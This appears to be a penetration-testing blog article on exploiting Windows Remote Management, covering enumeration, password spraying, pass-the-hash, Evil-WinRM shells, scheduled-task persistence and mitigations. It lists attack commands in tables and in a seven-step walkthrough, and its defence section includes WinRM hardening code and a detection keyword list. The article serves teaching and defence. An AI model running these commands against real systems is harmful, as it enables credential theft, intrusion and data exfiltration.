A Lean Guide In Exploiting WinRM for Penetration Testing 

Pentest | July 23, 2025

In 2025, a majority of cyberattacks use a company’s own tools against them. This “living-off-the-land” technique makes threats hard to spot. One of the most common tools hackers use is built right into your systems: Windows Remote Management (WinRM).

WinRM is designed to be “firewall-friendly,” which is exactly what makes it so dangerous. It often goes undetected by traditional security, creating a hidden backdoor. For US businesses, this useful management tool can be a major risk. So, how do you defend against a threat designed to be ignored?

Why WinRM is a Target for Penetration Testers

Penetration testers, and the hackers they imitate, love using WinRM. It provides a powerful and stealthy way to control systems across a network. In fact, Evil-WinRM, a popular open-source tool for pentesters, has over 4,900 stars on GitHub, showing widespread adoption in the ethical hacking community.

Here are the key reasons why it’s such a popular target for attacks in 2025.

  • It runs PowerShell remotely. WinRM is the main way to run PowerShell commands on other computers. PowerShell is a powerful scripting language built directly into Windows. This is a huge advantage for attackers, as cybersecurity reports this year show that PowerShell is used in a high percentage of network intrusions because it’s already a trusted part of the system.
  • It helps attackers “Live off the Land.” This tactic, known as LotL, means using a target’s own built-in tools to attack them. Using WinRM and PowerShell looks like normal IT work to many security systems. This helps attackers blend in and avoid being detected by antivirus or other monitoring tools.
  • It’s built for admins. WinRM is designed for IT administrators to manage servers. This means if an attacker steals an admin’s password, they can use WinRM to gain powerful access and potentially take over the entire network. For US businesses with large remote workforces, securing these admin tools is more critical than ever.

Why Can’t You Rely On Default Configuration and Ports?

Default settings are designed for convenience, not security. The default configuration of Windows Remote Management (WinRM) is a perfect example of this, creating a significant risk for many networks.

Here’s what you need to know:

  • It uses common ports. WinRM communicates over standard web ports (HTTP 5985 and HTTPS 5986). These ports are often already open on internal firewalls, making the traffic hard to block without careful configuration.
  • It’s on by default for servers. On Windows Server 2012 and newer versions, WinRM is enabled automatically. The Windows Firewall is also pre-configured to allow WinRM traffic on private networks.

This default setup creates an open door for attackers. Once they gain a foothold in a network, they can use WinRM to move from machine to machine. This tactic, called lateral movement, is a major concern for US businesses. Cybersecurity data from mid-2025 shows that lateral movement is a key stage in the vast majority of major ransomware attacks and data breaches.

For an attacker, this default configuration makes it much easier to reach high-value targets, turning a small intrusion into a major compromise.

WinRM Enumeration and Discovery

Before launching an attack, penetration testers and hackers first gather information. This reconnaissance phase involves finding systems running WinRM and learning about their configuration.

Identifying Open WinRM Ports (Nmap Scans)

The first step is a simple port scan using a tool like Nmap to find open WinRM ports.

A key finding for an attacker is an open port 5985 (HTTP) without an open port 5986 (HTTPS). This means WinRM is communicating in plain text, without encryption. This is a common but critical oversight. Security audits in mid-2025 continue to find that a surprising number of internal US business networks still use unencrypted protocols, leaving them vulnerable to snooping.

Basic WinRM Service Status Check (Test-WSMan)

Attackers can use Test-WSMan, a tool built into PowerShell, to check if WinRM is running on a computer and to learn its operating system version.

This is a stealthy technique. Because Test-WSMan is a legitimate administrative tool, using it for reconnaissance often goes unnoticed by basic security monitoring. It’s a classic example of an attacker “living off the land” by using the system’s own tools against it.

User Enumeration (NetExec)

While WinRM itself doesn’t have a simple user lookup feature, attackers can use other tools to get the information they need. A powerful tool called NetExec can query the network for a complete list of user accounts.

This list is gold for an attacker. They can then use it to launch “password spraying” attacks against WinRM. This technique, which involves testing a few common passwords against many user accounts, remains a top method for gaining initial access in many US data breaches today. This shows how a weakness in one area of the network can be used to attack another.

WinRM Authentication Methods and Attacks

Understanding how users log in with WinRM is key to seeing how it can be attacked. Some login methods are secure, while others leave a wide-open door for hackers.

Supported Authentication Protocols

WinRM supports several login methods. By default, it uses secure options like Kerberos or NTLM, which do not send passwords in clear text.

However, it can also be configured to use “Basic” authentication. This method is highly insecure because it sends the username and password in a way that is very easy for an attacker to read. Using insecure login methods is a huge risk, as compromised credentials continue to be the cause of a vast number of data breaches in the US.

NTLM Relay Attacks

This is a clever attack where a hacker tricks a computer, captures its login attempt, and then “relays” or forwards it to another computer to gain access. This attack often works when other basic security settings, like SMB signing, are not enabled on the network. It shows how one small misconfiguration can lead to a major security problem.

Password Spraying (NetExec)

Instead of trying hundreds of passwords on one user account (which would lock it out), password spraying is the opposite. An attacker tries one or two very common passwords (like Summer2025!) against hundreds of different user accounts.

This tactic remains highly effective in mid-2025, as many organizations still struggle with users choosing weak or common passwords. A tool called NetExec makes it easy for attackers to automate this process against WinRM.

Pass-the-Hash (Evil-WinRM, NetExec)

This is a powerful technique where an attacker doesn’t need your password at all. They only need to steal the “hash” (a scrambled version of your password) from a computer’s memory.

Tools like Evil-WinRM allow an attacker to use this stolen hash to log in to other machines on the network. This type of lateral movement is a key stage in most major ransomware attacks, as it allows hackers to move silently from one computer to another.

Key Table: Common WinRM Attacks with NetExec

This table shows simple commands used to attack WinRM with the popular tool NetExec.

Attack Type      | Example Command                                            | Purpose
-----------------|------------------------------------------------------------|-----------------------------------------------------------
Basic Login      | nxc winrm <target> -u user -p 'Pass123!'                   | Tests a specific username and password.
Password Spray   | nxc winrm <target> -u users.txt -p 'Summer2025!'           | Tries one password against a list of users.
Pass-the-Hash    | nxc winrm <target> -u user -H <hash>                       | Logs in using a stolen password hash instead of the password.
Run Command      | nxc winrm <target> -u user -p 'Pass123!' -x 'whoami'       | Runs a command on the remote machine after logging in.

Remote Command Execution via WinRM

Once an attacker has valid login credentials, WinRM becomes a powerful tool for running commands on other computers. This is where a small breach can turn into a major incident.

PowerShell Remoting (Invoke-Command, Enter-PSSession)

This is the official, built-in Windows way to control computers remotely using WinRM. An attacker doesn’t need to install any extra software.

This is a major threat. By using legitimate Windows tools, attackers can “live off the land,” making their activity hard to spot. Recent security reports for mid-2025 show a sharp increase in “fileless” attacks that run entirely in a computer’s memory, making them very difficult for traditional antivirus programs to detect. Because PowerShell Remoting is a trusted feature, it gives attackers the perfect cover.

Evil-WinRM Usage

Evil-WinRM is a popular tool built by the security community specifically for hacking with WinRM. It makes the process of attacking much simpler.

This tool gives an attacker an easy-to-use, interactive command prompt on the target machine. It streamlines logging in with stolen passwords or hashes and makes it simple to upload or download files. Think of it as a specialized weapon designed to exploit WinRM’s power.

NetExec (formerly CrackMapExec) for WinRM

NetExec is a powerful tool designed to automate attacks across an entire network. For WinRM, it can be used to run commands on hundreds of computers at once.

A key feature of NetExec is its ability to “obfuscate” or scramble its commands to hide from security software. The rise of powerful, free, open-source tools like NetExec means US businesses can no longer rely on just firewalls. Robust Endpoint Detection and Response (EDR) solutions are now essential for spotting this kind of internal activity.

Key Table: Evil-WinRM Core Commands

This table shows the basic commands for Evil-WinRM, a tool designed for WinRM exploitation.

Command   | Example Usage                            | Description
----------|------------------------------------------|------------------------------------------------
Login     | evil-winrm -i <IP> -u USER -p PASS       | Starts a remote control session with a password.
Upload    | upload local_file.txt remote_file.txt    | Sends a file from your computer to the target.
Download  | download remote_file.txt local_file.txt  | Gets a file from the target computer.
Shell     | whoami                                   | Runs commands on the remote machine.

Persistence and Lateral Movement with WinRM

After an attacker gets inside a network, their goals change. They want to spread to other computers and make sure they can’t be kicked out. WinRM is a powerful tool for both of these tasks.

Leveraging WinRM for Lateral Movement

Lateral movement is when an attacker uses one compromised computer to attack other computers on the same internal network.

Once an attacker has an administrator password, they can use WinRM to log into other valuable systems, like servers. From there, they can run tools to steal even more passwords from memory. This is a critical stage for attackers. Cybersecurity data for mid-2025 shows that the average “dwell time”—the time an attacker is inside a network before being detected—can be weeks or even months. Lateral movement is what they do during this time to find and steal valuable data.

Establishing Persistence (Scheduled Tasks via WinRM)

Persistence is how an attacker ensures they can always get back into a system, even if the computer is rebooted or the user logs off.

A common and very effective way to do this is with the built-in Windows Task Scheduler. An attacker can use WinRM to create a hidden, scheduled task on a compromised machine. This task can be set to automatically re-run their malicious code every few minutes or every time a user logs in. This is a top tactic for attackers because it blends in with normal system activity. In fact, the use of the legitimate Task Scheduler is one of the most common persistence techniques seen in US corporate breaches.

Evasion Techniques

Skilled attackers don’t just break in; they know how to hide. When using WinRM and PowerShell, they have several powerful ways to avoid being detected by security software.

PowerShell In-Memory Execution

This is a stealthy attack that runs entirely in a computer’s RAM, or memory. The malicious code is never saved to the hard drive as a file.

This is a growing threat for US businesses. Because traditional antivirus programs mainly scan files on the disk, they are often blind to this type of attack. Security analyses in mid-2025 show that “fileless” malware now accounts for a significant and increasing percentage of all cyberattacks, allowing hackers to operate invisibly.

AMSI Bypass (Evil-WinRM’s capabilities)

AMSI, or the Antimalware Scan Interface, is a modern Windows security feature. Think of it as a security guard that lets your antivirus software inspect what PowerShell scripts are doing as they run. An “AMSI Bypass” is a trick an attacker uses to fool or disable that guard.

Common bypass methods include:

  • Flipping a software switch in memory to tell AMSI to stop scanning.
  • Directly tampering with the AMSI program code while it’s running.
  • Using older versions of PowerShell that were created before AMSI existed.

Hacking tools like Evil-WinRM have these bypasses built-in, making it easy to run malicious code without setting off alarms. This means that relying on a single security feature is no longer enough. To combat these advanced techniques, companies now need modern tools like Endpoint Detection and Response (EDR) that can spot suspicious behavior, not just known viruses.

Mitigation and Defense Strategies

Defending against WinRM attacks requires a security strategy with multiple layers. You cannot rely on just one control. Here are the key actions every US business should take.

Securing WinRM Configuration

The easiest way to reduce risk is to secure the tool itself. Don’t trust the default settings.

  • Turn it off. If your administrators do not need WinRM for remote management, disable it.
  • Force HTTPS. If you must use WinRM, configure it to require HTTPS (port 5986). This encrypts the traffic and verifies the server’s identity.
  • Limit Trusted Hosts. Tightly control which computers are allowed to connect via WinRM.

This is a critical first step. Security reports in mid-2025 show that simple server misconfigurations are still a leading cause of major data breaches.
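The three configuration steps above, carried out with PowerShell's WSMan: provider. This is an added example, not code from the original article; the certificate thumbprint and the management host name are placeholders, and it assumes a domain-joined host where Kerberos is available.

```powershell
# Added example: hardening the WinRM service on one Windows host.
# Run in an elevated PowerShell. Values below are placeholders/assumptions.
$CertThumbprint = '<THUMBPRINT_OF_SERVER_AUTH_CERT>'   # placeholder, not a real value
$ManagementHost = 'mgmt01.corp.example'                 # assumed admin jump host

# Option A: WinRM is not needed -> turn it off entirely.
function Disable-WinRMCompletely {
    Disable-PSRemoting -Force                 # removes the remoting session configs
    Stop-Service -Name WinRM
    Set-Service -Name WinRM -StartupType Disabled
}

# Option B: WinRM is needed -> encrypted transport and strong auth only.
function Set-WinRMHardened {
    # Refuse Basic auth and refuse any unencrypted message exchange.
    Set-Item -Path WSMan:\localhost\Service\Auth\Basic -Value $false
    Set-Item -Path WSMan:\localhost\Service\AllowUnencrypted -Value $false
    # Kerberos stays on (domain default); CredSSP off unless explicitly required.
    Set-Item -Path WSMan:\localhost\Service\Auth\CredSSP -Value $false

    # Remove the plain HTTP listener (5985) and create an HTTPS listener (5986).
    Get-ChildItem -Path WSMan:\localhost\Listener |
        Where-Object { $_.Keys -contains 'Transport=HTTP' } |
        Remove-Item -Recurse -Force
    New-Item -Path WSMan:\localhost\Listener -Transport HTTPS -Address * `
        -CertificateThumbprint $CertThumbprint -Force | Out-Null

    # Belt and braces: block inbound 5985 at the host firewall as well,
    # so a later re-enabled HTTP listener is still unreachable.
    New-NetFirewallRule -DisplayName 'Block WinRM HTTP (5985)' -Direction Inbound `
        -Protocol TCP -LocalPort 5985 -Action Block | Out-Null

    # Caveat: TrustedHosts is a *client-side* list. It controls which remote
    # hosts this machine will send non-Kerberos credentials to, so keep it
    # empty or limited to the admin jump host rather than '*'.
    Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value $ManagementHost -Force
}

# Verification: Basic and unencrypted must be off, and no HTTP listener may remain.
function Test-WinRMHardened {
    $basic = (Get-Item -Path WSMan:\localhost\Service\Auth\Basic).Value
    $unenc = (Get-Item -Path WSMan:\localhost\Service\AllowUnencrypted).Value
    $http  = Get-ChildItem -Path WSMan:\localhost\Listener |
             Where-Object { $_.Keys -contains 'Transport=HTTP' }
    [pscustomobject]@{
        BasicAuthDisabled   = ($basic -eq 'false')
        UnencryptedDisabled = ($unenc -eq 'false')
        NoHttpListener      = ($null -eq $http)
    }
}
```

Who may connect at all is governed separately by the session configuration ACL (Set-PSSessionConfiguration -Name Microsoft.PowerShell -ShowSecurityDescriptorUI), which is where to remove broad groups such as Remote Management Users if they do not need access.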

Implementing Strong Authentication

How users log in is your most important defense. Weak passwords make even the strongest firewalls useless.

  • Avoid “Basic” Auth. This method sends login details in a way that is easy to steal. Use more secure options like Kerberos.
  • Require Multi-Factor Authentication (MFA). This is the single most effective defense against stolen credentials. Up-to-date security data consistently shows that MFA can block over 99% of account compromise attacks.

Monitoring and Detection

You need to be able to spot suspicious activity, even when attackers use legitimate tools.

  • Use an EDR solution. Traditional antivirus is not enough. An Endpoint Detection and Response (EDR) tool watches for suspicious behavior, not just known viruses. It can spot an attacker using PowerShell for malicious reasons.
  • Turn on PowerShell logging. Enable detailed logging features like Script Block Logging and Transcription. This creates a record of all commands being run, which is essential for investigating an incident.
  • Monitor Scheduled Tasks. Keep an eye out for any strange new tasks being created on your systems, as this is a common way for hackers to maintain persistence.

PowerShell Logging and Constrained Language Mode

Finally, you should harden PowerShell itself to make it a less effective weapon for attackers.

  • Use Constrained Language Mode. This setting limits PowerShell’s capabilities for regular users, preventing them from running advanced or dangerous commands.
  • Require Signed Scripts. Configure your systems to only run PowerShell scripts that have been digitally signed by a trusted administrator. This prevents attackers from running their own unauthorized code.
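The logging recommended under Monitoring and Detection and the hardening in this section, followed by three queries that sweep the resulting logs for the WinRM activity described earlier in the article. This is an added example, not code from the original article; the 24-hour window, the transcript directory and the keyword list are assumptions to tune for your environment.

```powershell
# Added example: enable PowerShell audit logging, require signed scripts,
# and query the logs that WinRM and PowerShell activity leave behind. Run elevated.
function Enable-PowerShellAuditLogging {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Script Block Logging -> event 4104 in Microsoft-Windows-PowerShell/Operational
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    # Transcription -> full session text on disk (assumed path; use an ACL-protected location)
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting   -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts' -Type String
    # Signed scripts only. Not a security boundary on its own, but it blocks casual script drops.
    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
}

# Inbound remote shells: Microsoft-Windows-WinRM/Operational ID 91 is written on the
# server each time a WSMan shell is created (Invoke-Command, Enter-PSSession, Evil-WinRM).
function Get-RecentWinRMShells {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-WinRM/Operational'
        Id        = 91
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, UserId, Message
}

# Script blocks (4104) that touch AMSI or use decode/download-and-run helpers.
# These are heuristics, not proof; review each hit against the transcript.
function Get-SuspiciousScriptBlocks {
    param([int]$Hours = 24,
          [string[]]$Patterns = @('amsi', 'FromBase64String', 'Invoke-Expression', 'DownloadString'))
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    Where-Object { $m = $_.Message; $Patterns | Where-Object { $m -match $_ } } |
    Select-Object TimeCreated, Message
}

# New scheduled tasks: Security ID 4698 ("A scheduled task was created").
# Requires the "Audit Other Object Access Events" subcategory to be enabled.
function Get-NewScheduledTasks {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4698
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message
}
```

Constrained Language Mode is enforced through an application control policy (WDAC or AppLocker in allow-list mode), which puts PowerShell into that mode automatically; there is no supported registry switch for it, so it is not set here.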

How to Exploit WinRM for Penetration Testing: Step-by-Step

Understanding how an attack works is key to defending against it. This is a typical path a penetration tester—or a real attacker—would follow to exploit WinRM. The entire process, from initial scan to data theft, can sometimes happen in just a matter of hours.

Step 1: Identify WinRM Targets

The first goal is to find computers on the network with WinRM enabled. This is done by scanning for open WinRM ports (5985 and 5986).

Bash

# Scan a target for open WinRM ports

nmap -p 5985,5986 <target_IP>

Step 2: User Enumeration

Next, the attacker needs a list of valid usernames. Tools like NetExec can scan the network and discover user accounts.

Bash

# Get a list of users from a target

nxc smb <target_IP> --users

Step 3: Authentication and Credential Attacks

With a list of users, the attacker tries to get a valid password. Common methods include:

  • Password Spraying: Trying one common password against many different users.
  • Pass-the-Hash: Using a stolen password hash to log in without knowing the actual password.

Bash

# Example: Password spraying with NetExec

nxc winrm <target_IP> -u users.txt -p 'Summer2025!'

Step 4: Establish Remote Shell (Evil-WinRM)

Once they have a valid login, attackers use a tool like Evil-WinRM to get a remote command prompt on the target machine.

Bash

# Connect to a target with a password

evil-winrm -i <target_IP> -u <username> -p <password>

Step 5: Post-Exploitation and Lateral Movement

With remote control, the attacker can now do damage. They can steal more passwords, set up persistence to maintain access, and move to other computers on the network.

PowerShell

# Example: Create a scheduled task for persistence

schtasks /create /tn "Update" /tr "C:\tmp\payload.exe" /sc onlogon

Step 6: Evasion Techniques

To avoid getting caught, attackers use tricks to hide their activity. This includes running code directly in a computer’s memory to bypass antivirus and using built-in features to disable security monitoring tools like AMSI.

Step 7: Data Exfiltration

The final goal is often to steal sensitive data. Using their remote shell, attackers can find valuable files and download them to their own computer.

Bash

# Download a sensitive file with Evil-WinRM

download C:\secrets\project_data.zip /home/attacker/loot/

Conclusion

Windows Remote Management (WinRM) is a useful tool for IT admins and a powerful weapon for hackers. Attackers use this trusted, built-in feature to move silently through your network, making them very difficult to detect.

Protecting your US business requires a layered defense. You must secure WinRM’s configuration, enforce Multi-Factor Authentication (MFA), and use modern security tools to monitor for suspicious behavior. With the cost of cybercrime reaching new highs in mid-2025, securing these internal pathways is no longer optional. It is an essential part of modern defense.